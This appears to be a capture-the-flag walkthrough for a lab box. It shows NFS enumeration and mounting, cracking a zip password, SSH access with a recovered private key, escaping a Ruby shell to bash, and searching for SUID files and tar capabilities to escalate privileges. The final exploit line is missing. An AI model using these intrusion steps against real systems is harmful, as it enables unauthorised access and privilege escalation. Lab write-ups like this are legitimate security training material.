The Server From Hell

Walkthrough for The Server from Hell 

nmap scan the IP we have - 

111 (rpcbind), 1137 (probably telnet/trim?), 2049 (nfs), 3333(ssh)


We can futher enumrate rpc and nfs -


To know
which folder has the server available to mount we an ask it using- 

showmount -e IP


we can mount this folder using - sudo mount -t nfs IP:/home/nfs /tmp/1


It conatins a backup.zip file we can copy it, while unzipping it we see it is password protected,
(the room owner may have hide the password in some other process, but i cracked it online)
After cracking the zip we see flag.txt and id_rsa

we can ssh into hades' shell using - ssh -i id_rsa hades@IP -p 3333

after sshing we got some kind of shell (not bash or sh), after searching for irb we get it's a ruby shell
we can run system commands by- system("command-here"), we can also spawn bash using - 
exec "/bin/bash" and can see the user flag -

We can see we don't have write permissions, so we can't upload scripts to check for attack vector

We have to manually check for ways to privilege escalation -

1) we don't have password for hades so we can't use commands containing sudo (eg. sudo -l)

2) we can list files with SUID by - find / -type f -perm /4000 2>>/dev/null
        (we got a very big list but we don't have a lead)

3) we can check for capabilities - getcap / -r 2>>/dev/null      we got tar - 

after searching gtfobins we got -

we can read the root flag using this -


Hope you find the help you were looking for :) please suggest me corrections if any...
Thanks for reading !

Comments

Post a Comment